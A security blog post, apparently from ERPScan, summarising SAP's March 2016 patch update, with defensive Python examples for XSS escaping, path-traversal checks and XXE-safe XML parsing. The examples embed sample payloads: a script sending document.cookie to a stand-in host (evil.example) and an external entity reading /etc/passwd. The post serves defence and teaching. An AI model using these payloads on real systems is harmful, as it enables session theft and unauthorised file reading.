SAP has released its monthly critical patch update for March 2016. The update closes 28 vulnerabilities in SAP products: 18 SAP Security Patch Day Notes and 10 Support Package Notes. 12 of the Notes were released between the second Tuesday of the previous month and the second Tuesday of this month, and 3 are updates to previously published Security Notes.
3 of the closed SAP Security Notes have a High priority rating and 2 are rated Hot News. The highest CVSS Base Score among the vulnerabilities is 9.0.
Most of the patched vulnerabilities affect SAP Java applications.
The most common vulnerability types are Cross-Site Scripting and Information Disclosure.
This month, five critical vulnerabilities found by ERPScan researcher Vahagn Vardanyan were closed.
About XSS Vulnerabilities
Today, in 2016, we can still state that XSS remains the most common type of security issue in SAP applications. It is one of the oldest vulnerability classes in web software: the term was introduced in early 2000 and, unfortunately, the bug is still with us. Cross-site scripting occurs when a web application takes untrusted data, places it in a web page without proper validation or output escaping, and sends that page to a browser. It lets an attacker execute script in the victim's browser to steal user sessions, deface web sites, or redirect the victim to malicious sites. In the OWASP Top 10 list, cross-site scripting is ranked third (A3 in the 2013 edition).
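To make the mechanism concrete, here is an added example (our illustration, not code from any SAP component) of the two halves of a reflected XSS: a handler that echoes a request parameter straight into HTML, and the same handler with output encoding applied at the point where the data leaves the application. The payload string is constructed for the demo; the `render_link` helper shows why entity encoding alone is not enough in an attribute context such as `href`.

```python
import html
from urllib.parse import quote

# Constructed sample payload of the kind a reflected-XSS probe sends in a
# URL parameter that a page echoes back (a "tester" or navigation page).
SAMPLE_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(name: str) -> str:
    """Echoes untrusted input straight into HTML: the vulnerable pattern."""
    return f"<p>Results for {name}</p>"


def render_escaped(name: str) -> str:
    """Same page with HTML entity encoding applied at the output point.
    quote=True also encodes ' and " so the value is safe inside attributes."""
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def render_link(target: str) -> str:
    """Attribute (href) context: escaping is not sufficient on its own,
    because a javascript: URL needs no angle brackets to execute.
    Allow only http(s) schemes, then percent-encode and entity-encode."""
    if not target.lower().startswith(("http://", "https://")):
        target = "#"
    safe_url = quote(target, safe=":/?&=#")
    return f'<a href="{html.escape(safe_url, quote=True)}">link</a>'


def contains_active_markup(rendered: str) -> bool:
    """Crude check used by the demo: did a script tag survive rendering?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_PAYLOAD))   # script tag reaches the browser
    print(render_escaped(SAMPLE_PAYLOAD))      # rendered as harmless text
    print(render_link("javascript:alert(1)"))  # scheme refused, href="#"
```

The point to carry over to SAP Java code is that the encoding has to match the output context (HTML body, attribute, URL, JavaScript), and that it belongs at the output point rather than at the input, since the same value is often rendered in several places.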
As for SAP cyber security, cross-site scripting is the most frequent vulnerability in SAP products, and not only this month. ERPScan's "Analysis of 3000 Vulnerabilities in SAP" research states that 22% of all vulnerabilities found in SAP products are XSS: 727 XSS vulnerabilities were closed between 2009 and 2015, and over 100 of them were reported by ERPScan researchers alone.
This type of vulnerability is a problem not only in SAP's software but also on SAP's own servers. For example, we wrote earlier about a 0-day XSS vulnerability on the SAP website that was disclosed by a researcher.
Given the prevalence and impact of this vulnerability class, the ERPScan research team has published a white paper describing how to protect SAP systems from XSS. We would like to draw attention to this issue once again and recommend that you follow that guideline.
Issues that were patched with the help of ERPScan
Below are the details of the SAP vulnerabilities found by the ERPScan researcher.
- An XML external entity vulnerability in SAP Configuration Wizard (CVSS Base Score: 6.4). Update is available in SAP Security Note 2235994. An attacker can use an XML external entity vulnerability to send specially crafted XML requests, carrying external entity declarations, that the application's XML parser processes without authorisation checks. This allows the attacker to gain unauthorised access to files on the OS filesystem.
- A Cross-site scripting vulnerability in SAP NavigationURLTester (CVSS Base Score: 6.1). Update is available in SAP Security Note 2238375. An attacker can use a Cross-site scripting vulnerability to inject a malicious script into a page. More information about XSS vulnerabilities in SAP systems is available in ERPScan’s research.
- A Cross-site scripting vulnerability in SAP User Interface/Navigation (CVSS Base Score: 6.1). Update is available in SAP Security Note 2238765. An attacker can use a Cross-site scripting vulnerability to inject a malicious script into a page.
- A Directory traversal vulnerability in SAP Java Monitoring (CVSS Base Score: 5.8). Update is available in SAP Security Note 2234971. An attacker can use a directory traversal to step out of the intended directory and access arbitrary files and directories on the SAP server filesystem, including application source code, configuration, and system files. It allows obtaining critical technical and business-related information stored in the vulnerable SAP system.
- An Information disclosure vulnerability in SAP Real Time Collaboration Chat (CVSS Base Score: 4.3). Update is available in SAP Security Note 2255990. An attacker can use an information disclosure vulnerability to reveal additional information (system data, debugging information, etc.) that helps to learn about the system and to plan further attacks.
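The directory traversal item above is the classic case of a file-serving endpoint joining a user-supplied name onto a base directory. As an added example (ours, not code from SAP Java Monitoring or any SAP component), the following shows the check that closes it: resolve the final path, including `..` segments and symlinks, and only then verify that it is still under the intended root. The sandbox directory and its "secret" file are constructed for the demo.

```python
import os
import tempfile


class PathTraversalError(ValueError):
    """Raised when a requested path would leave the permitted directory."""


def resolve_under_root(root: str, requested: str) -> str:
    """Return the real path of `requested` only if it stays inside `root`.
    Symlinks and '..' are resolved before the comparison, so
    'logs/../../etc/passwd', 'sub/../../x' and absolute paths are all refused."""
    real_root = os.path.realpath(root)
    # os.path.join discards `root` when `requested` is absolute; that is fine,
    # because the commonpath check below then rejects the result.
    candidate = os.path.realpath(os.path.join(real_root, requested))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise PathTraversalError(f"refusing path outside {real_root}: {requested}")
    return candidate


def read_under_root(root: str, requested: str) -> bytes:
    """Hardened version of 'read the file the client asked for'."""
    with open(resolve_under_root(root, requested), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed sandbox: a 'logs' directory the endpoint may serve, next to
    a secret file that must stay unreadable. Returns the outcome per request."""
    base = tempfile.mkdtemp()
    logs = os.path.join(base, "logs")
    os.mkdir(logs)
    with open(os.path.join(logs, "server.log"), "w") as fh:
        fh.write("ok")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("constructed secret")
    results = {}
    for req in ("server.log", "../secret.txt", "sub/../../secret.txt",
                os.path.join(base, "secret.txt")):
        try:
            results[req] = read_under_root(logs, req).decode()
        except PathTraversalError:
            results[req] = "REFUSED"
    return results


if __name__ == "__main__":
    for request, outcome in demo().items():
        print(f"{request!r:40} -> {outcome}")
```

Note that a blacklist of `..` strings is not a substitute for this: URL-encoded (`%2e%2e`), double-encoded and backslash variants get past string matching, whereas comparing the resolved path against the resolved root is independent of how the traversal was spelled.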
Other critical issues closed by SAP Security Notes March 2016
Some of our readers and clients asked us to categorize the most critical SAP vulnerabilities to patch them first. Companies providing SAP Security Audit, SAP Vulnerability Assessment, or SAP Penetration Testing services can include these vulnerabilities in their checklists. The most critical vulnerabilities of this update can be patched by the following SAP Security Notes:
- 2260344: SAP SCTC_* function modules have an OS command execution vulnerability (CVSS Base Score: 9.0). An attacker can use an OS command execution vulnerability to run operating system commands on the SAP server. Executed commands run with the same privileges as the service that executed them. The attacker can thereby access arbitrary files and directories on the SAP server filesystem, including application source code, configuration, and critical system files, and obtain critical technical and business-related information stored in the vulnerable SAP system. Install this SAP Security Note to prevent the risk.
- 2037304: SAP SDCC Download Function Module has an implementation flaw (CVSS Base Score: 8.5). Depending on the specific flaw, an implementation error can cause unpredictable behaviour of a system and problems with stability and security. Such patches correct configuration errors, add new functionality and increase system stability. Install this SAP Security Note to prevent the risk.
- 2253850: SAP RTMF has an XML external entity vulnerability (CVSS Base Score: 6.3). An attacker can use an XML external entity vulnerability to send specially crafted XML requests, carrying external entity declarations, that the application's XML parser processes without authorisation checks. This allows the attacker to gain unauthorised access to files on the OS filesystem. Install this SAP Security Note to prevent the risk.
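Two of this month's Notes (2235994 in the Configuration Wizard and 2253850 in RTMF) are XML external entity issues, so one added example covers both. It is our illustration, not code from either SAP component, and uses Python's standard-library parsers rather than the Java stack the Notes concern. It shows the payload shape, the simplest robust defence (refuse any document that carries a DTD), and the fallback when DTDs must be accepted (parse with external general entities switched off). The XML documents are constructed for the demo.

```python
import io
import re
import xml.etree.ElementTree as ET
from xml.sax import handler, make_parser


class UnsafeXMLError(ValueError):
    """Raised when a document carries DTD constructs we refuse to process."""


# Constructed payload: the classic XXE probe. In a vulnerable parser the
# &xxe; reference expands to the contents of the named file and is echoed
# back wherever the application reflects the parsed value.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE cfg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<config><param>&xxe;</param></config>"""

BENIGN = b"<config><param>value</param></config>"

_DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def parse_strict(data: bytes) -> ET.Element:
    """Reject any document with a DTD before it reaches a parser. Dropping
    DOCTYPE support removes external entities, internal entity expansion
    (billion laughs) and external DTD fetches in one move."""
    if _DTD_MARKER.search(data):
        raise UnsafeXMLError("DTD/entity declarations are not accepted")
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    """Convenience wrapper so callers can ask 'would parse_strict refuse this?'."""
    try:
        parse_strict(data)
    except UnsafeXMLError:
        return True
    return False


def parse_no_external(data: bytes) -> str:
    """Fallback when DTDs must be tolerated: a SAX parser with external
    general entities disabled, so SYSTEM entities are never fetched.
    Returns the collected character data so the demo can show that the
    &xxe; reference yields nothing instead of file contents."""
    class Collect(handler.ContentHandler):
        def __init__(self):
            super().__init__()
            self.text = []

        def characters(self, content):
            self.text.append(content)

    parser = make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    collector = Collect()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.text)


if __name__ == "__main__":
    print("strict rejects payload:", is_rejected(XXE_PAYLOAD))
    print("strict accepts benign :", parse_strict(BENIGN).find("param").text)
    print("no-external text      :", repr(parse_no_external(XXE_PAYLOAD)))
```

For the Java parsers used in SAP Java applications the equivalent controls are the JAXP features `http://apache.org/xml/features/disallow-doctype-decl` (set to true) or, where DTDs are needed, `http://xml.org/sax/features/external-general-entities` and `external-parameter-entities` (both set to false).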
It is highly recommended that SAP customers patch all those SAP vulnerabilities to prevent business risks affecting SAP systems.
SAP has traditionally thanked the ERPScan security researchers for the vulnerabilities they found on its acknowledgement page.
Advisories with technical details for these SAP vulnerabilities will be available on erpscan.com in 3 months. Exploits for the most critical vulnerabilities are already available in ERPScan Security Monitoring Suite.